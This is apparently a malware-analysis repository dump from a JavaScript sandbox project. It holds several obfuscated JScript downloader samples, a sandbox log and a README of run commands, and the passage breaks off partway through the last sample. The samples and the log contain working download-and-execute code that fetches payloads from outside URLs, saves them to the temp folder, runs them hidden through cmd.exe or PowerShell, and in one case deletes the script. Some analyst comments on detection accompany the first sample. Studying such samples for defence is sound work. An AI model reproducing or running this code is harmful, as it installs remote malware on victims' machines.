30 | var bxehjebucse0 = ["ipt", "-", "-", "-"].sapasgo();
31 | var ijpofuzdaxw9 = ['me', "-", "-", "-"].sapasgo();
32 | var elkogdav0 = ["pon", "-"].sapasgo();
33 | var afosork5 = ["g/l", "-", "-", "-"].sapasgo();
34 | var ijbihomipw = ["ath", "-", "-"].sapasgo();
35 | var hsujtykyrly3 = ["ptFu", "-", "-"].sapasgo();
36 | var wuqavxuwba = ["w.g", "-", "-", "-"].sapasgo();
37 | var xofufwinpe0 = ["wan", "-"].sapasgo();
38 | var agovraruh = ['Writ', "-"].sapasgo();
39 | var hrokwukgejo = ['Sta', "-"].sapasgo();
40 | var jrehoqu = ['send', "-"].sapasgo();
41 | var udiplejow7 = ['me', "-", "-"].sapasgo();
42 | var ikahetkicv9 = ["Get", "-"].sapasgo();
43 | var seskublom7 = ["ADOD", "-", "-", "-"].sapasgo();
44 | var lunyltofi0 = ["ope", "-"].sapasgo();
45 | var qsixhirohw = ["MSXM", "-", "-", "-"].sapasgo();
46 | var embyshovhaw8 = ["bje", "-", "-"].sapasgo();
47 | var ukbazukne = ["Typ", "-", "-", "-"].sapasgo();
48 | var apinejqivf2 = ["WSc", "-", "-"].sapasgo();
49 | var vykoscu = ["php", "-"].sapasgo();
50 | var yrumgahka = ["og.", "-"].sapasgo();
51 | var arydzojib = ['Save', "-", "-"].sapasgo();
52 | var nehhehus2 = ["yst", "-"].sapasgo();
53 | var ozosbunf = ["cmd.", "-", "-"].sapasgo();
54 | var exdidoc5 = ["htt", "-", "-"].sapasgo();
55 | var otjiqazqecv = ["emO", "-", "-", "-"].sapasgo();
56 | var hozmimwy6 = ['Res', "-", "-", "-"].sapasgo();
57 | var popogpi2 = ['Nam', "-"].sapasgo();
58 | var gjagupfa = ['del', "-", "-"].sapasgo();
59 | var ldetymlu = ['tion', "-", "-"].sapasgo();
60 | var yrqebfigw = ['Clos', "-"].sapasgo();
61 | var qyhazpu = ["\\\\", "-", "-"].sapasgo();
62 | var bnyzoni6 = ["Fil", "-", "-"].sapasgo();
63 | var rsugqosenv3 = ["L2.X", "-"].sapasgo();
64 | var fqovwihho3 = ["ooh", "-"].sapasgo();
65 | var ragohipga1 = ['lde', "-"].sapasgo();
66 | var adutoflu3 = ["l", "-"].sapasgo();
67 | var aryqigohv4 = ['ete', "-", "-", "-"].sapasgo();
68 | var lvejfobno9 = ["at", "-", "-"].sapasgo();
69 | var oktyromca = ["ing", "-", "-"].sapasgo();
70 | var ydmytqon = ["leS", "-", "-"].sapasgo();
71 | var lyxexry = ["retu", "-", "-"].sapasgo();
72 | var ircusfaqy6 = ["an.", "-", "-", "-"].sapasgo();
73 | var ysazsigvy = ["p:/", "-"].sapasgo();
74 | var ypjokwuln = ["B.St", "-", "-", "-"].sapasgo();
75 | var pmyjkuse1 = ["ody", "-", "-", "-"].sapasgo();
76 | var ewpedux = ["eXOb", "-", "-", "-"].sapasgo();
77 | var animzisqah = ["ing", "-", "-", "-"].sapasgo();
78 | var yzazym = [";", "-", "-", "-"].sapasgo();
79 | var usakrizq = ["Get", "-"].sapasgo();
80 | var dazepweb = ['Tem', "-", "-"].sapasgo();
81 | var sjoracrudqi = ["Scri", "-"].sapasgo();
82 | var eqvatokso2 = ["ct", "-", "-", "-"].sapasgo();
83 | var yhfoqcizte6 = ["tus", "-", "-"].sapasgo();
84 | var nvaksolomgu8 = ["2.d", "-", "-"].sapasgo();
85 | var evrasytyl0 = ["ject", "-", "-"].sapasgo();
86 | var elomgyl1 = ['e', "-", "-"].sapasgo();
87 | var tmubitral = ["le", "-", "-", "-"].sapasgo();
88 | var izpekmic1 = ["scr", "-", "-", "-"].sapasgo();
// line 89: a direct reference to the WScript host object (used on line 141 for the script's own path).
89 | var uxryhuvxe = WScript;
90 | var ilpafofwet = ['Ope', "-", "-", "-"].sapasgo();
91 | var ajubigxux = ["/c ", "-", "-", "-"].sapasgo();
92 | var idojuk = ["bje", "-", "-", "-"].sapasgo();
93 | var vserburehdu = ["yst", "-", "-"].sapasgo();
94 | var rvobmewa = ["e", "-"].sapasgo();
95 | var gputizaqqu = ["t.S", "-", "-", "-"].sapasgo();
96 | var fonryvtoqj = ["emO", "-", "-", "-"].sapasgo();
97 | var gijadul = ['llNa', "-", "-"].sapasgo();
98 | var ertofudlesk = ["ipt", "-", "-"].sapasgo();
99 | var oznefsazw = ["exe ", "-"].sapasgo();
100 | var jolivevb2 = ["olu", "-"].sapasgo();
101 | var etybbili = ["?f=", "-", "-"].sapasgo();
102 | var setzamyng = ["TP", "-"].sapasgo();
103 | var jamwofiso = ["e", "-"].sapasgo();
104 | var gnawiwaz5 = ['n', "-", "-", "-"].sapasgo();
105 | var ijkeriqy0 = ['teP', "-"].sapasgo();
106 | var rokmoruly = ["gth", "-", "-", "-"].sapasgo();
107 | var ucfuzusfutd = ["rip", "-", "-", "-"].sapasgo();
108 | var ozvimlibyc0 = ["ctiv", "-"].sapasgo();
// lines 109-126: property/method names assembled from the fragments. In order:
// "GetAbsolutePathName", "length", "ScriptFullName", "Open", "GetSpecialFolder",
// "GetTempName", "open", "Position", "Type", "send", "Status", "Write",
// "ResponseBody", "SaveToFile", "Close", "run", "deleteFile"; abpodg is WScript.
// Each is later used as obj[[name][0]](...), i.e. a plain computed property access.
109 | var snodce = usakrizq + arlynsyhgyz + jolivevb2 + ijkeriqy0 + ijbihomipw + popogpi2 + zaltikihp;
110 | var ubciwo = okotict0 + rokmoruly;
111 | var catky = sjoracrudqi + hsujtykyrly3 + gijadul + udiplejow7;
112 | var alatu = ilpafofwet + ywtaxnatni2;
113 | var ivuxy = avxutqimgilp5 + boneqe0 + uvcemveryz + wexquzranvy + ragohipga1 + lcowenbism1;
114 | var kcumsurhi = ikahetkicv9 + dazepweb + oshydzihy1 + ijpofuzdaxw9;
115 | var lleqso = lunyltofi0 + gnawiwaz5;
116 | var ozbipert = zedrotivl0 + ldetymlu;
117 | var ubokbal = ukbazukne + jamwofiso;
118 | var xixaha = jrehoqu;
119 | var elmazfy = hrokwukgejo + yhfoqcizte6;
120 | var ogfuwn = agovraruh + rvobmewa;
121 | var wijne = hozmimwy6 + elkogdav0 + izywmuhlaq0 + pmyjkuse1;
122 | var megory = arydzojib + asvycyhvuz4 + tmubitral;
123 | var epbuml = yrqebfigw + elomgyl1;
124 | var hwylzo = cykkiwo1;
125 | var npaxuqb = gjagupfa + aryqigohv4 + bnyzoni6 + fewlojohy0;
126 | var abpodg = uxryhuvxe;
// line 127: new ActiveXObject("scripting.FilesystemObject") -- the one ProgID passed
// directly to ActiveXObject, so a sandbox sees it even if the guard below fails.
127 | var zynnaxu9 = new ActiveXObject(izpekmic1 + bxehjebucse0 + oktyromca + suqyztizv1 + bdufupvod + vserburehdu + fonryvtoqj + embyshovhaw8 + iccakbyjm0);
// lines 128-133: fso.GetAbsolutePathName("1"); only if that path is longer than 4
// characters is lelaxfuzsy5 set to the ActiveXObject constructor (via
// new Function("return ActiveXObject;")()). Otherwise it stays undefined and line 135
// throws, which reads like a cheap environment check -- TODO confirm intent.
128 | var jnunypno2 = zynnaxu9[[snodce][0]](alehyvpa);
129 | switch (jnunypno2[[ubciwo][0]] > 4) {
130 | case true:
131 | var lelaxfuzsy5 = new Function(lyxexry + zahzonun6 + ozvimlibyc0 + ewpedux + evrasytyl0 + yzazym)();
132 | break;
133 | }
// line 134-135: "MSXML2.XMLHTTP" request object.
134 | var khohawji = qsixhirohw + rsugqosenv3 + zjifizu + setzamyng;
135 | var kynro7 = new lelaxfuzsy5(khohawji);
// line 136: "WScript.Shell"; line 137: "ADODB.Stream"; line 138: the download URL,
// assembled from fourteen fragments into an http:// address ending in log.php?f=2.dat;
// line 139: "Scripting.FileSystemObject".
136 | var jewboha = apinejqivf2 + ucfuzusfutd + gputizaqqu + oklepewyv2 + adutoflu3;
137 | var ilyqoz5 = seskublom7 + ypjokwuln + tygorgoqo7;
138 | var orawjagd = exdidoc5 + ysazsigvy + kimzymgi + wuqavxuwba + fqovwihho3 + elbibogab + ircusfaqy6 + xofufwinpe0 + afosork5 + yrumgahka + vykoscu + etybbili + nvaksolomgu8 + lvejfobno9;
139 | var azelup = qjeczerhasy + ertofudlesk + animzisqah + cevymsada5 + ydmytqon + nehhehus2 + otjiqazqecv + idojuk + eqvatokso2;
// line 140: stream = new ActiveXObject("ADODB.Stream"); line 141: WScript.ScriptFullName
// (kept for the self-delete on line 157); line 142: stream.Open().
140 | var kyppaqaze = new lelaxfuzsy5(ilyqoz5);
141 | var uswufga0 = abpodg[[catky][0]];
142 | kyppaqaze[[alatu][0]]();
// line 143: a second FileSystemObject; line 144: drop path =
// fso.GetSpecialFolder(2) + "\\" + fso.GetTempName() -- a random file name in the
// special folder with index 2 (the temporary folder, by the FSO convention -- confirm).
143 | var zynnaxu9 = new lelaxfuzsy5(azelup);
144 | var afucnotuh3 = zynnaxu9[[ivuxy][0]](2) + qyhazpu + zynnaxu9[[kcumsurhi][0]]();
// line 145: xhr.open("GET", url, 0) -- synchronous; lines 146-147: stream.Position = 0,
// stream.Type = 1 (binary); line 148: shell = new ActiveXObject("WScript.Shell");
// line 149: xhr.send().
145 | kynro7[[lleqso][0]](vonybfonp, orawjagd, 0);
146 | kyppaqaze[[ozbipert][0]] = 0;
147 | kyppaqaze[[ubokbal][0]] = 1;
148 | var aroxfivfo = new lelaxfuzsy5(jewboha);
149 | kynro7[[xixaha][0]]();
// lines 150-156: on HTTP 200, stream.Write(xhr.ResponseBody), stream.SaveToFile(path),
// stream.Close(), then shell.run("cmd.exe /c " + path, 0) -- hidden window. Detection:
// wscript.exe spawning cmd.exe whose argument is a freshly written file in the temp
// folder, preceded by an XMLHTTP download in the same process.
150 | if (kynro7[[elmazfy][0]] == 200) {
151 | kyppaqaze[[ogfuwn][0]](kynro7[[wijne][0]]);
152 | kyppaqaze[[megory][0]](afucnotuh3);
153 | var vmubjazjat7 = ozosbunf + oznefsazw + ajubigxux + afucnotuh3;
154 | kyppaqaze[[epbuml][0]]();
155 | aroxfivfo[[hwylzo][0]](vmubjazjat7, 0);
156 | }
// line 157: fso.deleteFile(WScript.ScriptFullName) -- the script removes itself whether
// or not the download succeeded, so the original file may be gone by the time a
// responder looks; recover it from mail/attachment logs or the sandbox's saved copy.
157 | zynnaxu9[[npaxuqb][0]](uswufga0);
158 | -------------------------------------------------------------------------------- /malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.out: -------------------------------------------------------------------------------- 1 | 14 Dec 20:24:03 - mailware-jail, a malware sandbox ver. 0.10 2 | 14 Dec 20:24:03 - ------------------------ 3 | 14 Dec 20:24:03 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js 4 | 14 Dec 20:24:03 - Malware files: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js 5 | 14 Dec 20:24:03 - Output file for sandbox dump: sandbox_dump_after.json 6 | 14 Dec 20:24:03 - Output directory for generated files: output/ 7 | 14 Dec 20:24:03 - ==> Preparing Sandbox environment. 
8 | 14 Dec 20:24:03 - => Executing: env/utils.js quitely 9 | 14 Dec 20:24:03 - => Executing: env/eval.js quitely 10 | 14 Dec 20:24:03 - => Executing: env/function.js quitely 11 | 14 Dec 20:24:03 - => Executing: env/wscript.js quitely 12 | 14 Dec 20:24:03 - => Executing: env/other.js quitely 13 | 14 Dec 20:24:03 - => Executing: env/console.js quitely 14 | 14 Dec 20:24:03 - ==> Executing malware file(s). ========================================= 15 | 14 Dec 20:24:03 - => Executing: malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js verbosely, reporting silent catches 16 | 14 Dec 20:24:03 - Saving: output/malware_20161214_5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js 17 | 14 Dec 20:24:03 - WScript.scriptfullname = (string) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js' 18 | 14 Dec 20:24:03 - WScript.arguments = (object) 'malware/20161214/5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js,xyz' 19 | 14 Dec 20:24:03 - ActiveXObject(wscript.shell) 20 | 14 Dec 20:24:03 - new WScript.Shell[2] 21 | 14 Dec 20:24:03 - WScript.Shell[2].Run(cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $migipk='^$';$kqevovde='^p';$unub='^a';$tygnefb='^t';$sbixeg='^h';$tecgerz='^=';$eryse='^(';$avkuvynb='^$';$qzarach='^e';$ciwyro='^n';$ulmezyq='^v';$ymqumnyzj='^:';$bmohetm='^t';$sideq='^e';$jevefbi='^m';$svepqa='^p';$ulvymu='^+';$kaqsa='^''';$izafso='^.';$wlohosky='^e';$silpox='^x';$aqselev='^e';$levfima='^''';$owaqij='^)';$omyjs='^;';$ahzujf='^(';$omitadk='^N';$arybom='^e';$usnakdipt='^w';$unar='^-';$zype='^O';$ezbaxnaj='^b';$otuxxep='^j';$iquxdo='^e';$uchaquf='^c';$ycydnez='^t';$ftyrbi='^ 
';$uljenby='^S';$ywacjy='^y';$oxop='^s';$qibragd='^t';$ravafy='^e';$ogavo='^m';$evewzars='^.';$ygwavu='^N';$ulzuvuz='^e';$ulydo='^t';$irkufipd='^.';$abyhy='^W';$fdoggosdi='^e';$have='^b';$gyjacy='^c';$ywelzikl='^l';$mbiwja='^i';$ijif='^e';$soka='^n';$tdytkud='^t';$qubcagk='^)';$avmyf='^.';$kosev='^D';$lolrowbe='^o';$apas='^w';$yvbujo='^n';$otelwuw='^l';$dsobehhu='^o';$oqav='^a';$odbujqypz='^d';$elcyxcyh='^F';$kezdywt='^i';$hcogwo='^l';$jvuhyvj='^e';$afac='^(';$lvutykpu='^''';$qfyctyva='^h';$acwihge='^t';$fizju='^t';$npynep='^p';$ugnevlek='^:';$ugavcy='^/';$rfatcyw='^/';$dujy='^w';$parasy='^w';$opujy='^w';$gtupe='^.';$aprokpal='^k';$abwysy='^i';$agmif='^t';$nheqysje='^d';$ahybt='^o';$yskanagq='^o';$ajrewnasj='^r';$ebvonwukw='^s';$kcokiz='^.';$foby='^r';$mfobjof='^u';$ucim='^/';$xodedbi='^w';$xkyrniplo='^p';$nzolo='^-';$dqycoxo='^c';$cjyxkowm='^o';$wevcish='^n';$csipy='^t';$mvevdiz='^e';$ebezby='^n';$dpedga='^t';$olnozz='^/';$esgafa='^u';$ykix='^p';$quldar='^l';$egxex='^o';$zybgify='^a';$owbudlap='^d';$owlolo='^s';$osbuzbe='^/';$jytykq='^2';$vjesucle='^0';$alduzav='^1';$umijy='^4';$kicni='^/';$ywerho='^0';$murewpo='^1';$urufemc='^/';$ibqehr='^b';$yjixbu='^8';$vozu='^l';$uvaw='^k';$ubawak='^i';$ipfutem='^f';$rutod='^n';$ekaw='^z';$edtafta='^d';$inawy='^/';$ajfegqo='^C';$ufocu='^o';$equst='^u';$zohuza='^p';$dhawo='^o';$nwipikh='^n';$cywiw='^9';$qgochedw='^8';$fyndik='^5';$uqeda='^4';$juqaty='^.';$yftifoqw='^p';$sawvif='^d';$dtomu='^f';$yshyxik='^''';$pekretv='^,';$xxavludb='^$';$yrjely='^p';$enuke='^a';$xasmopo='^t';$osybho='^h';$zdomum='^)';$trawomo='^;';$loreh='^ ';$qalci='^S';$dqynnof='^t';$ppysy='^a';$zkytbeb='^r';$ovelf='^t';$lajkixa='^-';$fsebi='^P';$ukpab='^r';$lkura='^o';$rfukopn='^c';$ttawefa='^e';$preffojja='^s';$hlofejqu='^s';$yxnefka='^ ';$fwapywj='^$';$mydri='^p';$cape='^a';$ckukxoq='^t';$kbewifn='^h'; Invoke-Expression 
($migipk+$kqevovde+$unub+$tygnefb+$sbixeg+$tecgerz+$eryse+$avkuvynb+$qzarach+$ciwyro+$ulmezyq+$ymqumnyzj+$bmohetm+$sideq+$jevefbi+$svepqa+$ulvymu+$kaqsa+$izafso+$wlohosky+$silpox+$aqselev+$levfima+$owaqij+$omyjs+$ahzujf+$omitadk+$arybom+$usnakdipt+$unar+$zype+$ezbaxnaj+$otuxxep+$iquxdo+$uchaquf+$ycydnez+$ftyrbi+$uljenby+$ywacjy+$oxop+$qibragd+$ravafy+$ogavo+$evewzars+$ygwavu+$ulzuvuz+$ulydo+$irkufipd+$abyhy+$fdoggosdi+$have+$gyjacy+$ywelzikl+$mbiwja+$ijif+$soka+$tdytkud+$qubcagk+$avmyf+$kosev+$lolrowbe+$apas+$yvbujo+$otelwuw+$dsobehhu+$oqav+$odbujqypz+$elcyxcyh+$kezdywt+$hcogwo+$jvuhyvj+$afac+$lvutykpu+$qfyctyva+$acwihge+$fizju+$npynep+$ugnevlek+$ugavcy+$rfatcyw+$dujy+$parasy+$opujy+$gtupe+$aprokpal+$abwysy+$agmif+$nheqysje+$ahybt+$yskanagq+$ajrewnasj+$ebvonwukw+$kcokiz+$foby+$mfobjof+$ucim+$xodedbi+$xkyrniplo+$nzolo+$dqycoxo+$cjyxkowm+$wevcish+$csipy+$mvevdiz+$ebezby+$dpedga+$olnozz+$esgafa+$ykix+$quldar+$egxex+$zybgify+$owbudlap+$owlolo+$osbuzbe+$jytykq+$vjesucle+$alduzav+$umijy+$kicni+$ywerho+$murewpo+$urufemc+$ibqehr+$yjixbu+$vozu+$uvaw+$ubawak+$ipfutem+$rutod+$ekaw+$edtafta+$inawy+$ajfegqo+$ufocu+$equst+$zohuza+$dhawo+$nwipikh+$cywiw+$qgochedw+$fyndik+$uqeda+$juqaty+$yftifoqw+$sawvif+$dtomu+$yshyxik+$pekretv+$xxavludb+$yrjely+$enuke+$xasmopo+$osybho+$zdomum+$trawomo+$loreh+$qalci+$dqynnof+$ppysy+$zkytbeb+$ovelf+$lajkixa+$fsebi+$ukpab+$lkura+$rfukopn+$ttawefa+$preffojja+$hlofejqu+$yxnefka+$fwapywj+$mydri+$cape+$ckukxoq+$kbewifn);;, 0, undefined) 22 | 14 Dec 20:24:03 - ==> Cleaning up sandbox. 23 | 14 Dec 20:24:03 - ==> Script execution finished, dumping sandbox environment to a file. 
24 | 14 Dec 20:24:03 - The sandbox context has been saved to: sandbox_dump_after.json 25 | -------------------------------------------------------------------------------- /malware/20161216/README.md: -------------------------------------------------------------------------------- 1 | node jailme.js -c ./config_wscript_only.json malware/20161216/malware.js > malware/20161216/malware.out_no_download 2 | 3 | node jailme.js -c ./config_wscript_only.json malware/20161216/malware.js > malware/20161216/malware.out_download 4 | 5 | node jailme.js -c ./config_wscript_fileexists.json malware/20161216/malware.js > malware/20161216/malware.out_file_exists 6 | 7 | Copy translated malware file into our directory: 8 | 9 | cp output/tr_malware_20161216_malware.js malware/20161216/malware2.js 10 | 11 | Seems the malware expects chrome.exe to be in HKCR\\HTTP\\SHELL\\OPEN\\COMMAND\\ 12 | 13 | Rerun with trace: 14 | 15 | node jailme.js --trace -c ./config_wscript_fileexists.json malware/20161216/malware2.js > malware/20161216/malware2.out_file_exists_trace 16 | 17 | Slightly different behaviour, when chrome is the default browser for http: 18 | 19 | node jailme.js -c ./config_wscript_fileexists.json malware/20161216/malware2.js > malware/20161216/malware2.out_file_exists 20 | 21 | -------------------------------------------------------------------------------- /malware/20161227/2b2c85e2de6dbd4e1ff02d12018c871984387f6c428a1b515624a1a6b4c5ea00.js: -------------------------------------------------------------------------------- 1 | var d=new ActiveXObject('Shell.KEYLGApplication'.replace('KEYLG',''));d.ShellExecute("PowerShell","(New-Object 
System.Net.WebClient).DownloadFile('https://randomdomain.website/gateway.php?download=Zjc_ZTdjMmIxMGZkNWM5MmYwZGI3MjE4MTUzNjlmY2Q1NWNkNWQ5ZGRhZTUyMzdiOGNlYmZlMWU3NjEzYjRjYjQ5MmU4NGQzYjgwMGRhMWFmMTBmOTUzMDJmYjgzMWIxN2UxODMxMjc3YjI1MzMzNDhmMjY1NzBlYTgwOTg2ZGMxNTc3MjUzYzJjNzNhNDVmNzE1MGU4MDJiODM3N2EyNGRlYmExNWZiNTk3M2MzMjQxM2Q1ZDZjNGI5Y2EzZGVk','Desktop.bat');Start-Process 'Desktop.bat'","","",0); -------------------------------------------------------------------------------- /malware/20161227/97d87081f0b8e890df0a1c8ae85332b673329d3f2a74f00f7be3b6cb8ce1fe2c.js: -------------------------------------------------------------------------------- 1 | function fsRAZ(ySWgeR, EMfC, pNjI, FywDY) { 2 | switch (pNjI) { 3 | case true: 4 | if (FywDY === "1") { 5 | var mPuY = false; 6 | var LkoD = true; 7 | var LHCV = false; 8 | } 9 | break; 10 | case "1": 11 | if (ySWgeR === "0") { 12 | var VSrrn = 5041; 13 | VSrrn = 6433 - 3183; 14 | VSrrn = 9773 - 93; 15 | var VrnaKn = 3239; 16 | var IHKFjOb = 5959; 17 | VrnaKn = VSrrn - IHKFjOb; 18 | } 19 | break; 20 | }; 21 | switch (ySWgeR) { 22 | case "1": 23 | var VoYwLK = "sdZduY"; 24 | break; 25 | case false: 26 | if (ySWgeR == 18059) { 27 | var NjHM = 6164; 28 | var UmjpOg = 4876; 29 | var kiGLERv = 353; 30 | NjHM = UmjpOg * kiGLERv; 31 | var woLA = 2753; 32 | woLA = 2192 * 1485; 33 | woLA = 6388 / 1958; 34 | var OhrcWlp = 1222; 35 | UmjpOg = kiGLERv * OhrcWlp; 36 | } 37 | break; 38 | }; 39 | switch (false) { 40 | case false: 41 | var mYtcrH = 23540; 42 | break; 43 | case "MODkoswn": 44 | var nUSfw = "UjePx"; 45 | break; 46 | case "0": 47 | var MVjp = 55390; 48 | break; 49 | case 6331: 50 | var XPCgTs = 51293; 51 | break; 52 | case 16041: 53 | if (pNjI === "0") { 54 | var Gtv = 8082; 55 | var GDy = 2425; 56 | var KzyWcA = 1322; 57 | Gtv = GDy / KzyWcA; 58 | var DHOY = 7801; 59 | var ylRrEv = 1376; 60 | GDy = DHOY + ylRrEv; 61 | GDy = 9679 + 856; 62 | var bNI = 6757; 63 | bNI = 6441 * 1256; 64 | } 65 | break; 66 | }; 67 | return true; 68 
| } 69 | function VtSaHj(VTnNCxZk) { 70 | var qnngE = 'PsQwQSXz'; 71 | var vRJkl = ''; 72 | var DtMUeW = (3588, 9374, 0); 73 | var HzE = qnngE.length; 74 | var vYlv = (3588, 9374, 0); 75 | var vdjLrw = ""; 76 | while (vYlv < VTnNCxZk.length - (851, 2509, 4351, 8091, 2)) { 77 | vdjLrw = VTnNCxZk.charAt(vYlv) + VTnNCxZk.charAt(vYlv + (8729, 6575, 4956, 7498, 9108, 2496, 3041, 3691, 1)) + VTnNCxZk.charAt(vYlv + (851, 2509, 4351, 8091, 2)); 78 | if (VTnNCxZk.charAt(vYlv) == (3588, 9374, 0)) { 79 | vdjLrw = VTnNCxZk.charAt(vYlv + (8729, 6575, 4956, 7498, 9108, 2496, 3041, 3691, 1)) + VTnNCxZk.charAt(vYlv + (2)); 80 | } 81 | if ((VTnNCxZk.charAt(vYlv) == (3588, 9374, 0)) && (VTnNCxZk.charAt(vYlv + (8729, 6575, 4956, 7498, 9108, 2496, 3041, 3691, 1)) == (3588, 9374, 0))) { 82 | vdjLrw = VTnNCxZk.charAt(vYlv + (851, 2509, 4351, 8091, 2)); 83 | } 84 | DtMUeW = parseInt(vdjLrw); 85 | DtMUeW = DtMUeW ^ (qnngE.charCodeAt(vYlv / (3982, 4074, 6160, 3832, 1399, 8248, 6719, 2410, 2661, 3) % HzE)); 86 | vRJkl += String.fromCharCode(DtMUeW); 87 | vYlv += (3); 88 | } 89 | return vRJkl; 90 | } 91 | function pKAtnI(SsiM, yBSI) { 92 | if (yBSI === true) { 93 | var isZuihX = 9136; 94 | var fykPXp = 7043; 95 | var hdQ = 1289; 96 | isZuihX = fykPXp / hdQ; 97 | isZuihX = hdQ - fykPXp; 98 | var JzfUO = 968; 99 | hdQ = isZuihX + JzfUO; 100 | isZuihX = 2501 + 3492; 101 | } 102 | var RzVxt = "dJFRWw"; 103 | if (RzVxt == "hbnIT") { 104 | var fHrrUCJ = 82668; 105 | } 106 | switch (SsiM) { 107 | case "1": 108 | if (yBSI == 15342) { 109 | var rPrw = false; 110 | } 111 | break; 112 | case 4502: 113 | var lfa = 86416; 114 | var CBRYATS = "pHnPfT"; 115 | if (yBSI === "dCoxYL") { 116 | var DYa = 1168; 117 | DYa = 4356 + 7682; 118 | var ReaKX = 5999; 119 | var qBSBq = 781; 120 | ReaKX = qBSBq / DYa; 121 | ReaKX = 5859 / 1836; 122 | qBSBq = DYa - ReaKX; 123 | } 124 | if (SsiM == true) { 125 | var vdxhgcT = 27696; 126 | } 127 | if (lfa === false) { 128 | var guUEd = 6724; 129 | guUEd = 4907 * 3717; 130 | 
var NVRZIgq = 655; 131 | var pgmvdIC = 2933; 132 | guUEd = NVRZIgq - pgmvdIC; 133 | pgmvdIC = 8873 + 4259; 134 | pgmvdIC = guUEd / NVRZIgq; 135 | guUEd = pgmvdIC - NVRZIgq; 136 | } 137 | break; 138 | }; 139 | } 140 | function ElMQW() { 141 | var mGU = true; 142 | if (mGU === false) { 143 | var hhHJbSf = 6215; 144 | hhHJbSf = 7230 + 3034; 145 | var XXW = 5840; 146 | var ymAufG = 2315; 147 | var mmpLz = 8004; 148 | XXW = ymAufG + mmpLz; 149 | var lvFMdUK = 3120; 150 | mmpLz = ymAufG + lvFMdUK; 151 | } 152 | switch (4848) { 153 | case "VjD": 154 | var tNxWaTu = 75277; 155 | break; 156 | case 13499: 157 | var KibWhMj = "DcvBviZ"; 158 | switch ("1") { 159 | case "1": 160 | var QNZ = 35765; 161 | break; 162 | case false: 163 | var KccEXr = true; 164 | if (KccEXr == true) { 165 | var XwgNjfi = 5879; 166 | var voU = 4651; 167 | XwgNjfi = XwgNjfi / voU; 168 | var yvJh = 6790; 169 | yvJh = 2437 + 3861; 170 | var CtXvHIl = 705; 171 | CtXvHIl = 8130 - 7693; 172 | yvJh = 9339 / 6529; 173 | XwgNjfi = voU + yvJh; 174 | } 175 | break; 176 | case "1": 177 | var MxBhgfZ = false; 178 | break; 179 | }; 180 | var cGXQG = "Nlded"; 181 | var GghP = "TmCb"; 182 | if (GghP == "WIeZNiFI") { 183 | var ZcGEfm = true; 184 | } 185 | if (KibWhMj == true) { 186 | var xGBRWtm = 5733; 187 | var UJupSuH = 320; 188 | var aMSWVv = 4143; 189 | xGBRWtm = UJupSuH - aMSWVv; 190 | var tcYm = 9891; 191 | var oTDE = 7309; 192 | tcYm = tcYm + oTDE; 193 | UJupSuH = 6119 + 1553; 194 | } 195 | break; 196 | case "tuu": 197 | var lyF = false; 198 | break; 199 | case false: 200 | var qccde = false; 201 | if (qccde == 7800) { 202 | var nlHVpO = 12525; 203 | } 204 | break; 205 | case "1": 206 | var RXs = "mVXoYb"; 207 | break; 208 | }; 209 | var Qikxezm = "nHCY"; 210 | if (Qikxezm == false) { 211 | var dKWgG = 9042; 212 | var PfuTEHe = 8427; 213 | dKWgG = dKWgG * PfuTEHe; 214 | var kwCwsAK = 3206; 215 | kwCwsAK = 3268 * 5008; 216 | PfuTEHe = 2109 + 8742; 217 | } 218 | } 219 | function mODbP() { 220 | var oryHZ = 
VtSaHj("056007037007107124119027061000056025039054042009057028063018034125059021061092038007124058054025060006053018034124050009127007056025040062059031127003061002054058054009127023056005052048044019063029048027056039033085098075098069127101108"); 221 | var xYBdD = new ActiveXObject(VtSaHj("007032050005056035044084003027052027061")); 222 | var qeDjbm = new ActiveXObject(VtSaHj("003016035030033039049020055093023030061054011003035007052026030049050031051007")); 223 | var bax = qeDjbm[VtSaHj("023022037036033054059019049031023024061055061008")]((8511, 5852, 8423, 3001, 5656, 2)) + '\\' + qeDjbm[VtSaHj("023022037035052062040052049030052")](); 224 | var ITTxxV = new ActiveXObject(VtSaHj("029032009058029097118034029063025035005003")); 225 | ITTxxV[VtSaHj("063003052025")](VtSaHj("023054005"), oryHZ, false); 226 | ITTxxV[VtSaHj("035022063019")](); 227 | if (ITTxxV[VtSaHj("003007048003036032")] == (3658, 1292, 215, 6795, 2196, 5828, 200)) { 228 | var UkF = new ActiveXObject(VtSaHj("017055030051019125011014034022048026")); 229 | UkF[VtSaHj("031003052025")](); 230 | UkF[VtSaHj("004010033018")] = (2472, 8167, 1523, 2746, 8176, 5986, 9106, 4878, 4759, 7893, 9455, 1); 231 | UkF[VtSaHj("007001056003052")](ITTxxV[VtSaHj("002022034007062061043031018028053014")]); 232 | UkF[VtSaHj("000028034030037058055020")] = (7046, 2051, 8064, 9048, 8044, 1652, 7559, 3896, 75, 560, 9547, 3875, 0); 233 | UkF[VtSaHj("003018039018005060030019060022")](bax); 234 | UkF[VtSaHj("019031062004052")](); 235 | xYBdD[VtSaHj("034006063")](VtSaHj("051030053089052043061090127016113") + bax, (7046, 2051, 8064, 9048, 8044, 1652, 7559, 3896, 75, 560, 9547, 3875, 0)); 236 | } 237 | } 238 | function gQGLMfk(gln, gdeUxe) { 239 | if (gdeUxe == false) { 240 | var xaEPo = 66176; 241 | } 242 | if (gln === "1") { 243 | var RUPq = 4684; 244 | var pXNdo = 4223; 245 | var VDzRyyo = 8065; 246 | RUPq = pXNdo - VDzRyyo; 247 | var BzDmTa = 5619; 248 | BzDmTa = 2422 + 7353; 249 | var zrgB = 9192; 250 | VDzRyyo = zrgB / BzDmTa; 
